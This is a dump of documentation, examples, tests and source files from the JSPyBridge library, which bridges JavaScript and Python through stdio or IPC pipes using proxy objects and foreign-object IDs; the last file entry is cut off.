"ishan-marikar/JSPyBridge", "src_encoding": "UTF-8", "text": "## How it works\n\nThis bridge works through standard input/output pipes, there are no native modules and the \ncommunication can happen through anywhere--either pipes or network sockets.\n\nFor every property access, there is a communication protocol that allows one side to access the\naccess properties on the other side, and also complete function calls. \nNon-primitive values are sent as foreign object reference IDs (FFID). These FFIDs\nexist in a map on both sides of the bridge, and map numeric IDs with a object reference. \n\nOn the opposite side to the one which holds a reference, this FFID is assigned to a Proxy object.\nIn JS, a ES6 proxy is used, and in Python, the proxy is a normal class with custom `__getattr__` \nand other magic methods. Each proxy property access is mirrored on the other side of the bridge. \n\nProxy objects on both sides of the bridge are GC tracked. In JavaScript, all python Proxy objects\nare registered to a FinalizationRegistry. In Python, `__del__` is used to track the Proxy object's\ndestruction. When the proxy object is destoryed on one side of the bridge, its refrence is removed\nfrom the other side of the bridge. This means you don't have to deal with memory management.\n\n### On the JavaScript side\nThe magic behind this is the usage of Proxy chains which permits call stack build up, until\na .then call for property access or a function call is done. Afterwards, the callstack is sent\nand executed in Python." }, { "alpha_fraction": 0.6541889309883118, "alphanum_fraction": 0.6595365405082703, "avg_line_length": 34.0625, "blob_id": "92fbed7711386638dc7b55f5003fd9ed837f43a6", "content_id": "877a7ea957965b58717c8dcd5ff42975987bc408", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 1683, "license_type": "permissive", "max_line_length": 104, "num_lines": 48, "path": "/examples/javascript/nltk.js", "repo_name": "ishan-marikar/JSPyBridge", "src_encoding": "UTF-8", "text": "import { python } from 'pythonia'\nimport fs from 'fs'\nconst nltk = await python('nltk')\n\n// ** You can comment this if you already have it.\nawait nltk.download('book')\n\nconst monologue = fs.readFileSync('./shakesphere.txt', 'utf-8')\n\n// First we use NLTK to tokenize, tag and \"chunk\" the words into a tree\nconst sentences = await nltk.sent_tokenize(monologue).then(v => v.valueOf())\nconst tokenized = await Promise.all(sentences.map(sentence => nltk.word_tokenize(sentence)))\nconst tagged = await Promise.all(tokenized.map(tok => nltk.pos_tag(tok)))\nconst chunked = await nltk.ne_chunk_sents$(tagged, { binary: true })\n\n// Some tree traversal logic to extract all the Named Entities (NE)\nasync function extractEntityNames (t) {\n const entityNames = []\n if (await t.label$) {\n const label = await t.label()\n if (label === 'NE') {\n for (const child of await t.valueOf()) {\n entityNames.push(child[0])\n }\n } else {\n for await (const child of t) {\n entityNames.push(...await extractEntityNames(child))\n }\n }\n }\n return entityNames\n}\n\nconst entityNames = []\n\n// Run the function above on each of the chunked trees\nfor await (const tree of chunked) {\n entityNames.push(...await extractEntityNames(tree))\n}\n\n// Compile the frequencies of each word\nconst frequencies = entityNames.reduce((acc, curr) => (acc[curr] ??= 0, acc[curr]++, acc), {})\n// Turn it to an array and list by most common\nconst result = Object.entries(frequencies).map(([k, v]) => [k, v]).sort((a, b) => b[1] - a[1])\n// Log it out, you should get [ [ 'Romeo', 5 ], [ 'Juliet', 2 ], [ 'Deny', 1 ], [ 'Montague', 1 ], ... ]\nconsole.log(result)\n// Exit python\npython.exit()\n" }, { "alpha_fraction": 0.6789558529853821, "alphanum_fraction": 0.6881054639816284, "avg_line_length": 31.04310417175293, "blob_id": "a7ca1bd0a6f0cce4ee27e7f644d315cf77508155", "content_id": "7de2c01d285513c6cfeec9b110e92e991f45efe3", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3718, "license_type": "permissive", "max_line_length": 231, "num_lines": 116, "path": "/docs/javascript.md", "repo_name": "ishan-marikar/JSPyBridge", "src_encoding": "UTF-8", "text": "## Iterating\n\n* When you iterate on a Python object, always use `for await` instead of a normal `for-of` loop.\n* You can use `py.enumerate` in JS, which works the same as `enumerate()` in Python\n\n## Evaluating Python in JS\n\nSometimes you need to evalutate Python code in JS, for example when dealing with operator overloading.\nThis is made simple by the bridge through the `py` template function. Just wrap a Python or JS reference\nwith a ${} and await the value.\n\nLet's add some matrices ...\n\n```js\nconst np = await python('numpy')\n\nconst A = await np.array(([1,2],[3,4]))\nconst B = await np.array(([2,2],[2,2]))\nconst r = await py`${A} + ${B} + ${np.array(([10,10],[10,10]))}`\n```\n\nNotice we don't need to await when concatenating here, it's done internally.\n\n## PyClass\n\n\nYou can create a Python class in JavaScript by extending PyClass.\n\nClass variables can exist on both the Python and JavaScript side, however since both sides can access \nvariables with the `this` or `self` variable, it doesn't matter where the variable resides. \nHowever, this can be an performance issue: if you access a variable alot on one side of the bridge,\nit's better to have the variable on the same side to avoid briding overhead.\n\n\n#### constructor(superclass: PythonRef = null, superArguments = [], superKwargs = {})\n\n* The constructor should initialize all the JS properties.\n* The constructor is where you specify the Python superclass (if any). You can leave the super() empty or not specify a constructor at all if you don't intend to override anything in Python.\n* Any variables you define here will be defined on the JS side, and exposed to Python.\n* Your constructor is called *before* the Python class is `__init__`'ed.\n\n#### init()\n\n* The init() method in your class is called after the Python superclass (if any) has been init'ed\n* Any variables you define here will exist on the Python side, but you can still access them from JS\n\n#### this\n\n* `this.parent` works like `super.` in normal JS. You can use it to force call a parent to avoid recusion.\n\ncalc.py\n```py\nimport math\nclass Calc:\n def __init__(self, degrees, integers=False):\n self.degrees = degrees\n self.integers = integers\n\n def add(self, a, b):\n return a + b\n\n def div(self, a, b):\n if self.integers:\n return round(a / b)\n else:\n return a / b\n \n def tan(self, val):\n if self.degrees:\n # We need to round here because floating points are imprecise\n return round(math.tan(math.radians(val)))\n return math.tan(val)\n```\n\ncalc.js\n```js\nimport { python, PyClass } from 'pythonia'\nconst calc = await python('./calc.py')\n\nclass MyCalculator extends PyClass {\n constructor() {\n // The second is an array of positional ... `true` maps to degrees. A third arg allows us to specify named arguments.\n // we could also do `super(calc.Calc, null, { degrees: true, integers: false })`\n super(calc.Calc, [true], { integers: false })\n }\n\n async mul (a, b) { // Multiply the cool way\n let res = a\n for (let i = 1; i < b; i++) {\n res = await this.add(res, b)\n }\n return res\n }\n\n async div(a, b) {\n // Call the superclass's div()\n const superExample = this.parent.div(a, b)\n return superExample\n }\n}\n\n\nconst calculator = await MyCalculator.init()\n\nconsole.log('3 * 3 = ', await calculator.mul(3, 3)) // 9 !\nconsole.log('tan(360deg) = ', await calculator.tan(360)) // 0 !\nconsole.log('6 / 3 = ', await calculator.div(6, 3)) // 2 !\n\npython.exit()\n```\n\n\n\n## ✔\n\nFor more info, see the README.md, the [type definitions](https://github.com/extremeheat/JSPyBridge/blob/master/src/pythonia/index.d.ts) and [the examples](https://github.com/extremeheat/JSPyBridge/tree/master/examples/javascript) !" }, { "alpha_fraction": 0.609684944152832, "alphanum_fraction": 0.6254375576972961, "avg_line_length": 18.930233001708984, "blob_id": "14fab65074743bb6f3e585354aebeedbd774ab56", "content_id": "0a01db4748918c310a887404a734357126841965", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1714, "license_type": "permissive", "max_line_length": 74, "num_lines": 86, "path": "/test/javascript/test.py", "repo_name": "ishan-marikar/JSPyBridge", "src_encoding": "UTF-8", "text": "import os\nimport time\nfrom javascript import require, console, On, Once, off, once, eval_js\n\nDemoClass = require(\"./test.js\").DemoClass\n\nchalk, fs = require(\"chalk\"), require(\"fs\")\n\nconsole.log(\"Hello\", chalk.red(\"world!\"))\nfs.writeFileSync(\"HelloWorld.txt\", \"hi!\")\n\ndemo = DemoClass(\"blue\", {\"a\": 3}, lambda v: print(\"Should be 3\", v))\ndemo2 = DemoClass.new(\"blue\", {\"a\": 3}, lambda v: print(\"Should be 3\", v))\n\nprint(demo.ok()(1, 2, 3))\nprint(demo.ok().x)\nprint(demo.toString())\nprint(\"Hello \", DemoClass.hello())\n\nconsole.log(demo.other(demo2), demo.array(), demo.array()[\"0\"])\n\n\nfor i in demo.array():\n print(\"i\", i)\n\n\ndef some_method(*args):\n print(\"Callback called with\", args)\n\n\ndemo.callback(some_method)\n\n\n@On(demo, \"increment\")\ndef handler(this, fn, num, obj):\n print(\"Handler caled\", fn, num, obj)\n if num == 7:\n off(demo, \"increment\", handler)\n\n\n@Once(demo, \"increment\")\ndef onceIncrement(this, *args):\n print(\"Hey, I'm only called once !\")\n\n\ndemo.increment()\ntime.sleep(0.5)\n\ndemo.arr[1] = 5\ndemo.obj[1] = 5\ndemo.obj[2] = some_method\nprint(\"Demo array and object\", demo.arr, demo.obj)\n\ntry:\n demo.error()\n print(\"Failed to error\")\n exit(1)\nexcept Exception as e:\n print(\"OK, captured error\")\n\nprint(\"Array\", demo.arr.valueOf())\n\ndemo.wait()\nonce(demo, \"done\")\n\ndemo.x = 3\n\npythonArray = []\npythonObject = {\"var\": 3}\n\n# fmt: off\nprint(eval_js('''\n for (let i = 0; i < 10; i++) {\n await pythonArray.append(i);\n pythonObject[i] = i;\n }\n pythonObject.var = 5;\n const fn = await demo.moreComplex()\n console.log('wrapped fn', await fn()); // Should be 3\n return 2\n'''))\n# fmt: on\n\nprint(\"My var\", pythonObject)\n\nprint(\"OK, we can now exit\")\n" }, { "alpha_fraction": 0.5843386650085449, "alphanum_fraction": 0.5889449715614319, "avg_line_length": 25.201148986816406, "blob_id": "167e5e9978d166c9a3fff421aaa4d099a1472d99", "content_id": "ff1dd6b134251bcda35ccf70e8c1fe4f9e624f0e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4559, "license_type": "permissive", "max_line_length": 168, "num_lines": 174, "path": "/src/javascript/connection.py", "repo_name": "ishan-marikar/JSPyBridge", "src_encoding": "UTF-8", "text": "import threading, subprocess, json, time, signal\nimport atexit, os, sys\nfrom . import config\nfrom .config import debug\n\n# Special handling for IPython jupyter notebooks\nstdout = sys.stdout\nnotebook = False\nNODE_BIN = getattr(os.environ, \"NODE_BIN\") if hasattr(os.environ, \"NODE_BIN\") else \"node\"\n\n\ndef is_notebook():\n try:\n from IPython import get_ipython\n except Exception:\n return False\n if \"COLAB_GPU\" in os.environ:\n return True\n\n shell = get_ipython().__class__.__name__\n if shell == \"ZMQInteractiveShell\":\n return True\n\n\nif is_notebook():\n notebook = True\n stdout = subprocess.PIPE\n\n\ndef supports_color():\n \"\"\"\n Returns True if the running system's terminal supports color, and False\n otherwise.\n \"\"\"\n plat = sys.platform\n supported_platform = plat != \"Pocket PC\" and (plat == \"win32\" or \"ANSICON\" in os.environ)\n # isatty is not always implemented, #6223.\n is_a_tty = hasattr(sys.stdout, \"isatty\") and sys.stdout.isatty()\n if notebook:\n return True\n return supported_platform and is_a_tty\n\n\nif supports_color():\n os.environ[\"FORCE_COLOR\"] = \"1\"\nelse:\n os.environ[\"FORCE_COLOR\"] = \"0\"\n\n# Currently this uses process standard input & standard error pipes\n# to communicate with JS, but this can be turned to a socket later on\n# ^^ Looks like custom FDs don't work on Windows, so let's keep using STDIO.\n\ndn = os.path.dirname(__file__)\nproc = com_thread = stdout_thread = None\n\n\ndef read_stderr(stderrs):\n ret = []\n for stderr in stderrs:\n inp = stderr.decode(\"utf-8\")\n for line in inp.split(\"\\n\"):\n if not len(line):\n continue\n if not line.startswith('{\"r\"'):\n print(\"[JSE]\", line)\n continue\n try:\n d = json.loads(line)\n debug(\"[js -> py]\", int(time.time() * 1000), line)\n ret.append(d)\n except ValueError as e:\n print(\"[JSE]\", line)\n return ret\n\n\nsendQ = []\n\n# Write a message to a remote socket, in this case it's standard input\n# but it could be a websocket (slower) or other generic pipe.\ndef writeAll(objs):\n for obj in objs:\n if type(obj) == str:\n j = obj + \"\\n\"\n else:\n j = json.dumps(obj) + \"\\n\"\n debug(\"[py -> js]\", int(time.time() * 1000), j)\n if not proc:\n sendQ.append(j.encode())\n continue\n try:\n proc.stdin.write(j.encode())\n proc.stdin.flush()\n except Exception:\n stop()\n break\n\n\nstderr_lines = []\n\n# Reads from the socket, in this case it's standard error. Returns an array\n# of responses from the server.\ndef readAll():\n ret = read_stderr(stderr_lines)\n stderr_lines.clear()\n return ret\n\n\ndef com_io():\n global proc, stdout_thread\n try:\n proc = subprocess.Popen(\n [NODE_BIN, dn + \"/js/bridge.js\"],\n stdin=subprocess.PIPE,\n stdout=stdout,\n stderr=subprocess.PIPE,\n )\n except Exception as e:\n print(\n \"--====--\\t--====--\\n\\nBridge failed to spawn JS process!\\n\\nDo you have Node.js 16 or newer installed? Get it at https://nodejs.org/\\n\\n--====--\\t--====--\"\n )\n stop()\n raise e\n\n for send in sendQ:\n proc.stdin.write(send)\n proc.stdin.flush()\n\n if notebook:\n stdout_thread = threading.Thread(target=stdout_read, args=(), daemon=True)\n stdout_thread.start()\n\n while proc.poll() == None:\n stderr_lines.append(proc.stderr.readline())\n config.event_loop.queue.put(\"stdin\")\n stop()\n\n\ndef stdout_read():\n while proc.poll() is None:\n print(proc.stdout.readline().decode(\"utf-8\"))\n\n\ndef start():\n global com_thread\n com_thread = threading.Thread(target=com_io, args=(), daemon=True)\n com_thread.start()\n\n\ndef stop():\n try:\n proc.terminate()\n except Exception:\n pass\n config.event_loop = None\n config.event_thread = None\n config.executor = None\n # The \"root\" interface to JavaScript with FFID 0\n class Null:\n def __getattr__(self, *args, **kwargs):\n raise Exception(\n \"The JavaScript process has crashed. Please restart the runtime to access JS APIs.\"\n )\n\n config.global_jsi = Null()\n # Currently this breaks GC\n config.fast_mode = False\n\n\ndef is_alive():\n return proc.poll() is None\n\n\n# Make sure our child process is killed if the parent one is exiting\natexit.register(stop)\n" }, { "alpha_fraction": 0.5853025913238525, "alphanum_fraction": 0.591354489326477, "avg_line_length": 28.658119201660156, "blob_id": "1fbe7f0143990b34b44546e45466fcfbbdee6c20", "content_id": "fd6101132e8519499c514641b2e18f7e99b74352", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 3470, "license_type": "permissive", "max_line_length": 106, "num_lines": 117, "path": "/src/pythonia/index.js", "repo_name": "ishan-marikar/JSPyBridge", "src_encoding": "UTF-8", "text": "if (typeof process !== 'undefined' && parseInt(process.versions.node.split('.')[0]) < 16) {\n console.error('Your node version is currently', process.versions.node)\n console.error('Please update it to a version >= 16.x.x from https://nodejs.org/')\n process.exit(1)\n}\n\nif (typeof window !== 'undefined') {\n var { StdioCom } = require('./WebsocketCom')\n} else {\n var { StdioCom } = process.platform === 'win32' ? require('./StdioCom') : require('./IpcPipeCom')\n}\n\nconst { dirname, join, resolve } = require('path')\nconst { PyClass, Bridge } = require('./Bridge')\nconst getCaller = require('caller')\n\nconst com = new StdioCom()\nconst bridge = new Bridge(com)\nglobalThis.__pythonBridge = bridge\nconst root = bridge.makePyObject(0)\n\nasync function py (tokens, ...replacements) {\n const vars = {} // List of locals\n let nstr = ''\n for (let i = 0; i < tokens.length; i++) {\n const token = tokens[i]\n const repl = await replacements[i]\n if (repl != null) {\n const v = '__' + i\n vars[v] = (repl.ffid ? ({ ffid: repl.ffid }) : repl)\n nstr += token + v\n } else {\n nstr += token\n }\n }\n return root.eval(nstr, null, vars)\n}\n\n// same as above but with eval instead -- todo: auto fix indent\nasync function pyExec (tokens, ...replacements) {\n const vars = {} // List of locals\n let nstr = ''\n for (let i = 0; i < tokens.length; i++) {\n const token = tokens[i]\n const repl = await replacements[i]\n if (repl != null) {\n const v = '__' + i\n vars[v] = (repl.ffid ? ({ ffid: repl.ffid }) : repl)\n nstr += token + v\n } else {\n nstr += token\n }\n }\n return root.exec(nstr, null, vars)\n}\n\npy.enumerate = what => root.enumerate(what)\npy.tuple = (...items) => root.tuple(items)\npy.set = (...items) => root.set(items)\npy.exec = pyExec\npy.with = async (using, fn) => {\n const handle = await (await using).__enter__()\n await fn(handle)\n await py`${using}.__exit__(*sys.exc_info())`\n}\n\nmodule.exports = {\n PyClass,\n builtins: root,\n py,\n python (file) {\n // The Python process could have been exited. In which case we want to start it again on a new import.\n if (!com.proc) com.start()\n if (file.startsWith('/') || file.startsWith('./') || file.startsWith('../') || file.includes(':')) {\n if (file.startsWith('.')) {\n const caller = getCaller(1)\n const prefix = process.platform === 'win32' ? 'file:///' : 'file://'\n const callerDir = caller.replace(prefix, '').split(/\\/|\\\\/).slice(0, -1).join('/')\n file = join(callerDir, file)\n }\n const importPath = resolve(file)\n const fname = file.split('/').pop() || file\n return root.fileImport(fname, importPath, dirname(importPath))\n }\n return root.python(file)\n },\n com\n}\nmodule.exports.python.exit = () => {\n bridge.end()\n com.end()\n}\nmodule.exports.python.cwd = path => {\n if (!path) {\n const caller = getCaller(1)\n const prefix = process.platform === 'win32' ? 'file:///' : 'file://'\n path = caller.replace(prefix, '').split('/').slice(0, -1).join('/')\n }\n return py`os.chdir(${path.replace('\\\\', '/')})`\n}\nmodule.exports.python.setFastMode = (val) => {\n root.sendInspect(!val)\n}\n\nif (typeof window !== 'undefined') {\n window.Python = module.exports\n\n console._log = console.log\n console.log = (...args) => {\n const nargs = []\n for (const arg of args) {\n if (arg.ffid) nargs.push(arg.$$.inspect())\n else nargs.push(arg)\n }\n console._log(...nargs)\n }\n}\n" }, { "alpha_fraction": 0.604519784450531, "alphanum_fraction": 0.6113801598548889, "avg_line_length": 29.219512939453125, "blob_id": "5f77f7a7620ebf48d955513af78398a16bd8c75f", "content_id": "8e8c6403c0920c67a4e73c907d79f22035e92f0e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 2478, "license_type": "permissive", "max_line_length": 105, "num_lines": 82, "path": "/src/pythonia/IpcPipeCom.js", "repo_name": "ishan-marikar/JSPyBridge", "src_encoding": "UTF-8", "text": "const cp = require('child_process')\nconst { join } = require('path')\n\nconst log = process.env.DEBUG ? console.log : () => {}\n\n// TODO: are dangling handlers an issue?\nclass StdioCom {\n constructor () {\n this.start()\n }\n\n start () {\n this.handlers = {}\n const stdio = ['inherit', 'inherit', 'inherit', 'ipc']\n const args = [join(__dirname, 'interface.py')]\n try {\n this.proc = cp.spawn(process.env.PYTHON_BIN || 'python3', args, { stdio })\n } catch (e) {\n if (e.code === 'ENOENT' && !process.env.PYTHON_BIN) this.proc = cp.spawn('python', args, { stdio })\n else throw e\n }\n // BAD HACK: since the channel is not exposed, and we need to send JSON with a\n // custom serializer, we basically have two choices:\n // 1) either JSON.stringify it with a custom encoder in our lib, then have it JSON.stringified\n // *again* in the Node.js standard lib, then unwrapped twice in Python, or\n // 2) use a hack to get the low level IPC API and write raw strings to it.\n // There is no 'string' serialization option for IPC. It's either JSON or 'Advanced' which uses\n // internal V8 serialization APIs; fast but unusable in Python.\n // See https://github.com/nodejs/node/issues/39317\n const symbols = Object.getOwnPropertySymbols(this.proc)\n const symbol = symbols.find(sym => sym.toString() === 'Symbol(kChannelHandle)')\n const channel = this.proc[symbol]\n channel._writeUtf8String = channel.writeUtf8String\n let ww\n channel.writeUtf8String = (...a) => {\n ww = a[0].constructor\n channel.writeUtf8String = channel._writeUtf8String\n return channel._writeUtf8String.apply(channel, a)\n }\n this.proc.send('')\n this._writeRaw = data => channel.writeUtf8String(new ww(), data)\n this.proc.on('message', data => {\n this.recieve(data)\n })\n }\n\n end () {\n this.proc.kill('SIGKILL')\n this.proc = null\n }\n\n recieve (j) {\n log('[py -> js]', j)\n if (this.handlers[j.c]) {\n return this.handlers[j.c](j)\n }\n if (this.handlers[j.r]) {\n if (this.handlers[j.r](j)) {\n return\n }\n delete this.handlers[j.r]\n }\n }\n\n register (eventId, cb) {\n this.handlers[eventId] = cb\n }\n\n write (what, cb) {\n log('[js -> py]', what)\n this.proc.send(what)\n if (cb) this.register(what.r, cb)\n }\n\n writeRaw (what, r, cb) {\n log('[js -> py]', what)\n this._writeRaw(what + '\\n')\n this.register(r, cb)\n }\n}\n\nmodule.exports = { StdioCom }\n" }, { "alpha_fraction": 0.6632652878761292, "alphanum_fraction": 0.6836734414100647, "avg_line_length": 23.625, "blob_id": "92031b993d2c3c27331c72a38156a6e59549b5fb", "content_id": "843878fbcde7f8a0698631301da7f8800c76874d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 196, "license_type": "permissive", "max_line_length": 54, "num_lines": 8, "path": "/examples/python/cheerio.py", "repo_name": "ishan-marikar/JSPyBridge", "src_encoding": "UTF-8", "text": "from javascript import require\ncheerio = require('cheerio');\nC = cheerio.load('<h2 class=\"title\">Hello world</h2>')\n\nC('h2.title').text('Hello there!')\nC('h2').addClass('welcome')\n\nprint(C.html())" }, { "alpha_fraction": 0.5175154209136963, "alphanum_fraction": 0.5183519721031189, "avg_line_length": 34.28782272338867, "blob_id": "e730d86c4dec647570d5752097514cc023e20e25", "content_id": "a7700b1ed356ca6f1aa211a369fac07d51451c36", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9566, "license_type": "permissive", "max_line_length": 99, "num_lines": 271, "path": "/src/javascript/pyi.py", "repo_name": "ishan-marikar/JSPyBridge", "src_encoding": "UTF-8", "text": "# THe Python Interface for JavaScript\n\nimport inspect, importlib, traceback\nimport os, sys, json, types\nimport socket\nfrom .proxy import Proxy\nfrom .errors import JavaScriptError, getErrorMessage\nfrom weakref import WeakValueDictionary\n\n\ndef python(method):\n return importlib.import_module(method, package=None)\n\n\ndef fileImport(moduleName, absolutePath, folderPath):\n if folderPath not in sys.path:\n sys.path.append(folderPath)\n spec = importlib.util.spec_from_file_location(moduleName, absolutePath)\n foo = importlib.util.module_from_spec(spec)\n spec.loader.exec_module(foo)\n return foo\n\n\nclass Iterate:\n def __init__(self, v):\n self.what = v\n\n # If we have a normal iterator, we need to make it a generator\n if inspect.isgeneratorfunction(v):\n it = self.next_gen()\n elif hasattr(v, \"__iter__\"):\n it = self.next_iter()\n\n def next_iter():\n try:\n return next(it)\n except Exception:\n return \"$$STOPITER\"\n\n self.Next = next_iter\n\n def next_iter(self):\n for entry in self.what:\n yield entry\n return\n\n def next_gen(self):\n yield self.what()\n\n\nfix_key = lambda key: key.replace(\"~~\", \"\") if type(key) is str else key\n\n\nclass PyInterface:\n m = {0: {\"python\": python, \"fileImport\": fileImport, \"Iterate\": Iterate}}\n # Things added to this dict are auto GC'ed\n weakmap = WeakValueDictionary()\n cur_ffid = 10000\n\n def __init__(self, ipc, exe):\n self.ipc = ipc\n # This toggles if we want to send inspect data for console logging. It's auto\n # disabled when a for loop is active; use `repr` to request logging instead.\n self.m[0][\"sendInspect\"] = lambda x: setattr(self, \"send_inspect\", x)\n self.send_inspect = True\n self.q = lambda r, key, val, sig=\"\": self.ipc.queue_payload(\n {\"c\": \"pyi\", \"r\": r, \"key\": key, \"val\": val, \"sig\": sig}\n )\n self.executor = exe\n\n def assign_ffid(self, what):\n self.cur_ffid += 1\n self.m[self.cur_ffid] = what\n return self.cur_ffid\n\n def length(self, r, ffid, keys, args):\n v = self.m[ffid]\n for key in keys:\n if type(v) in (dict, tuple, list):\n v = v[key]\n elif hasattr(v, str(key)):\n v = getattr(v, str(key))\n elif hasattr(v, \"__getitem__\"):\n try:\n v = v[key]\n except:\n raise LookupError(f\"Property '{fix_key(key)}' does not exist on {repr(v)}\")\n else:\n raise LookupError(f\"Property '{fix_key(key)}' does not exist on {repr(v)}\")\n l = len(v)\n self.q(r, \"num\", l)\n\n def init(self, r, ffid, key, args):\n v = self.m[ffid](*args)\n ffid = self.assign_ffid(v)\n self.q(r, \"inst\", ffid)\n\n def call(self, r, ffid, keys, args, kwargs, invoke=True):\n v = self.m[ffid]\n # Subtle differences here depending on if we want to call or get a property.\n # Since in Python, items ([]) and attributes (.) function differently,\n # when calling first we want to try . then []\n # For example with the .append function we don't want ['append'] taking\n # precedence in a dict. However if we're only getting objects, we can\n # first try bracket for dicts, then attributes.\n if invoke:\n for key in keys:\n t = getattr(v, str(key), None)\n if t:\n v = t\n elif hasattr(v, \"__getitem__\"):\n try:\n v = v[key]\n except:\n raise LookupError(f\"Property '{fix_key(key)}' does not exist on {repr(v)}\")\n else:\n raise LookupError(f\"Property '{fix_key(key)}' does not exist on {repr(v)}\")\n else:\n for key in keys:\n if type(v) in (dict, tuple, list):\n v = v[key]\n elif hasattr(v, str(key)):\n v = getattr(v, str(key))\n elif hasattr(v, \"__getitem__\"):\n try:\n v = v[key]\n except:\n raise LookupError(f\"Property '{fix_key(key)}' does not exist on {repr(v)}\")\n else:\n raise LookupError(f\"Property '{fix_key(key)}' does not exist on {repr(v)}\")\n\n # Classes when called will return void, but we need to return\n # object to JS.\n was_class = False\n if invoke:\n if inspect.isclass(v):\n was_class = True\n v = v(*args, **kwargs)\n typ = type(v)\n if typ is str:\n self.q(r, \"string\", v)\n return\n if typ is int or typ is float or (v is None) or (v is True) or (v is False):\n self.q(r, \"int\", v)\n return\n if inspect.isclass(v) or isinstance(v, type):\n # We need to increment FFID\n self.q(r, \"class\", self.assign_ffid(v), self.make_signature(v))\n return\n if callable(v): # anything with __call__\n self.q(r, \"fn\", self.assign_ffid(v), self.make_signature(v))\n return\n if (typ is dict) or (inspect.ismodule(v)) or was_class: # \"object\" in JS speak\n self.q(r, \"obj\", self.assign_ffid(v), self.make_signature(v))\n return\n if typ is list:\n self.q(r, \"list\", self.assign_ffid(v), self.make_signature(v))\n return\n if hasattr(v, \"__class__\"): # numpy generator can't be picked up without this\n self.q(r, \"class\", self.assign_ffid(v), self.make_signature(v))\n return\n self.q(r, \"void\", self.cur_ffid)\n\n # Same as call just without invoking anything, and args\n # would be null\n def get(self, r, ffid, keys, args):\n o = self.call(r, ffid, keys, [], {}, invoke=False)\n return o\n\n def Set(self, r, ffid, keys, args):\n v = self.m[ffid]\n on, val = args\n for key in keys:\n if type(v) in (dict, tuple, list):\n v = v[key]\n elif hasattr(v, str(key)):\n v = getattr(v, str(key))\n else:\n try:\n v = v[key]\n except:\n raise LookupError(f\"Property '{fix_key(key)}' does not exist on {repr(v)}\")\n if type(v) in (dict, tuple, list, set):\n v[on] = val\n else:\n setattr(v, on, val)\n self.q(r, \"void\", self.cur_ffid)\n\n def inspect(self, r, ffid, keys, args):\n v = self.m[ffid]\n for key in keys:\n v = getattr(v, key, None) or v[key]\n s = repr(v)\n self.q(r, \"\", s)\n\n # no ACK needed\n def free(self, r, ffid, key, args):\n for i in args:\n if i not in self.m:\n continue\n del self.m[i]\n\n def make_signature(self, what):\n if self.send_inspect:\n return repr(what)\n return \"\"\n\n def read(self):\n data = apiin.readline()\n if not data:\n exit()\n j = json.loads(data)\n return j\n\n def pcall(self, r, ffid, key, args, set_attr=False):\n # Convert special JSON objects to Python methods\n def process(json_input, lookup_key):\n if isinstance(json_input, dict):\n for k, v in json_input.items():\n if isinstance(v, dict) and (lookup_key in v):\n ffid = v[lookup_key]\n json_input[k] = Proxy(self.executor, ffid)\n else:\n process(v, lookup_key)\n elif isinstance(json_input, list):\n for k, v in enumerate(json_input):\n if isinstance(v, dict) and (lookup_key in v):\n ffid = v[lookup_key]\n json_input[k] = Proxy(self.executor, ffid)\n else:\n process(v, lookup_key)\n\n process(args, \"ffid\")\n pargs, kwargs = args\n if set_attr:\n self.Set(r, ffid, key, pargs)\n else:\n self.call(r, ffid, key, pargs, kwargs or {})\n\n def setval(self, r, ffid, key, args):\n return self.pcall(r, ffid, key, args, set_attr=True)\n\n # This returns a primitive version (JSON-serialized) of the object\n # including arrays and dictionary/object maps, unlike what the .get\n # and .call methods do where they only return numeric/strings as\n # primitive values and everything else is an object refrence.\n def value(self, r, ffid, keys, args):\n v = self.m[ffid]\n\n for key in keys:\n t = getattr(v, str(key), None)\n if t is None:\n v = v[key] # 🚨 If you get an error here, you called an undefined property\n else:\n v = t\n\n # TODO: do we realy want to worry about functions/classes here?\n # we're only supposed to send primitives, probably best to ignore\n # everything else.\n # payload = json.dumps(v, default=lambda arg: None)\n self.q(r, \"ser\", v)\n\n def onMessage(self, r, action, ffid, key, args):\n try:\n return getattr(self, action)(r, ffid, key, args)\n except Exception:\n self.q(r, \"error\", \"\", traceback.format_exc())\n pass\n\n def inbound(self, j):\n return self.onMessage(j[\"r\"], j[\"action\"], j[\"ffid\"], j[\"key\"], j[\"val\"])\n" }, { "alpha_fraction": 0.5141158699989319, "alphanum_fraction": 0.5453194379806519, "avg_line_length": 17.69444465637207, "blob_id": "4da0f27ac9a92f9ef014172f48686591de4df902", "content_id": "8f14ae0ea9abeda0a794530bc5ebc27e96f9250b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 673, "license_type": "permissive", "max_line_length": 55, "num_lines": 36, "path": "/test/pythonia/demo.py", "repo_name": "ishan-marikar/JSPyBridge", "src_encoding": "UTF-8", "text": "def add(demoClas1, demoClas2):\n # print(\"dc\", demoClas1, demoClas2)\n return demoClas1.var + demoClas2.var\n\n\ndef throw():\n raise Exception(\"hey I crashed!\")\n\n\ndef special(pos1, pos2, /, kwarg1=None, **kwargs):\n print(\"Fn call\", pos1, pos2, kwarg1, kwargs)\n\n\nclass DemoClass:\n \"\"\"Some doc\"\"\"\n\n def __init__(self, var):\n self.var = var\n\n def get(self, update):\n return self.var + update\n\n def nested(self):\n def some():\n return 3\n\n return some\n\n def arr(self):\n return [1, 2, 4]\n\n def barr(self):\n return bytearray()\n\n def dic(self):\n return {\"x\": {\"y\": 4, \"z\": [5, 6, 7, 8, None]}}\n" }, { "alpha_fraction": 0.5790576338768005, "alphanum_fraction": 0.5812801718711853, "avg_line_length": 34.62895965576172, "blob_id": "114d39c7ff4bbfb33c1b621bc135b0cbeab6b649", "content_id": "06a567d8af33974f3a4e324e3e171c34de60ea86", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 15748, "license_type": "permissive", "max_line_length": 144, "num_lines": 442, "path": "/src/pythonia/Bridge.js", "repo_name": "ishan-marikar/JSPyBridge", "src_encoding": 